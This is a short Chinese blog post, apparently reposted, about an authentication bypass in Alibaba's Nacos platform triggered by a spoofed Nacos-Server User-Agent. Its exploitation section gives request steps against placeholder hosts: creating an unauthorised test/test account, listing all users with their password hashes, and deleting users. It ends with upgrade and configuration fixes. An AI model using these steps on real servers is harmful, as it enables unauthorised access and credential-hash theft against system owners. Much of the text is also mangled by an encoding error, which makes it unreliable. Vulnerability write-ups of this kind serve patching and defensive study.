一、漏洞描述
Nacos是Alibaba的一個(gè)動(dòng)態(tài)服務(wù)發(fā)現(xiàn)、配置和服務(wù)管理平臺(tái)。攻擊者通過(guò)添加Nacos-Server的User-Agent頭部將可繞過(guò)(nacos.core.auth.enabled=true)鑒權(quán)認(rèn)證,從而進(jìn)行API操作。
二、漏洞利用
-
訪問(wèn)
http://xxxxx/nacos/v1/auth/users?username=test&password=test
,并使用burpsuite進(jìn)行抓包,將方法改為POST,返回“create user ok”即可未授權(quán)創(chuàng)建一個(gè)test/test
的用戶,使用創(chuàng)建用戶即可登入系統(tǒng) -
訪問(wèn)
http://xxxxxxx/nacos/v1/auth/users?pageNo=1&pageSize=999
即可獲取當(dāng)前nacos系統(tǒng)存在的用戶以及加密后的密碼。文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-562481.html
-
訪問(wèn)
http://xxxxxxxx/nacos/v1/auth/users?username=test
,并使用burpsuite進(jìn)行抓包,將方法改為DELETE,返回“delete user ok”即可未授權(quán)刪除test
的用戶文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-562481.html
三、漏洞修復(fù)
- 升級(jí)nacos至1.4.1以上,建議升級(jí)至最新版本。
- 修改conf/application.properties字段。
僅供學(xué)習(xí)參考使用?。∪魪S商有使用此版本,自行查驗(yàn),及時(shí)聯(lián)系官方進(jìn)行更新??!
到了這里,關(guān)于NACOS身份認(rèn)證繞過(guò)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!